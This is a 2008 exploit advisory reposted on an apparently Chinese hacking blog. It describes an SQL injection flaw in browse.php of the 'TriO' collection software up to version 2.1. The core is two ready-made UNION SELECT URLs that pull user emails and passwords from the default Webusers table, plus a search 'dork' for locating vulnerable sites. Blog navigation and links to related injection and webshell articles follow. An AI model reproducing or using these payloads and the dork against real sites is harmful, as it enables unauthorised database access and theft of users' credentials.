:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ dun[at]strcpy.pl ]
##############################################################
# [ TriO <= 2.1 ] Remote SQL Injection Vulnerability #
##############################################################
#
# [ Script: "TriO, iO's new web-based module, enables you to quickly, easily, and securely make your collections..." ]
#
# [ Script site: http://www.willo.com/io/trio.asp ]
#
# [ Default table_name with users: Webusers ]
#
# [ Vuln: browse.php ]
# http://site.com/browse.php?id=-1+UNION+SELECT+EMAIL+from+Webusers--
# http://site.com/browse.php?id=-1+UNION+SELECT+SUPERSECRETPASSWORD+from+Webusers--
#
#
# [ Dork example: "This website is powered by Trio" ]
#
#####################################################
# Greetz: D3m0n_DE * Voo|doo * str0ke and otherz..
#####################################################
[ dun / 2008 ]
*******************************************************************************************
TriO <= 2.1 (browse.php id) Remote SQL Injection Vulnerability
Tags:注射
添加书签: [QQ书签] [百度搜藏] [新浪ViVi] [365Key网摘] [天极网摘] [我摘] [POCO网摘] [和讯网摘]
2008-7-28 0:34:12 | 发布:admin | 分类:漏洞利用 | 评论:0 | 引用:0 | 浏览:
- 相关文章:
二次sql注入 (2008-7-17 13:50:47)
深入挖掘ORACLE内部SQLINJECTION (2008-6-27 22:50:7)
SQL server取得网站路径的几种方法 (2008-6-12 11:19:0)
Mssql2005 Log备份Webshell (2008-6-12 10:40:17)
渗透中用openrowset搞shell的方法 (2008-6-2 23:18:7)
Php注入点构造 (2008-4-13 2:32:19)
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
![[POCO网摘]](javascript:d=document;t=d.selection?(d.selection.type!='None'?d.selection.createRange().text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://my.poco.cn/fav/storeIt.php?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t)+'&img=http://www.h-strong.com/blog/logo.gif','keyit','scrollbars=no,width=475,height=575,status=no,resizable=yes'));keyit.focus();){kind=link}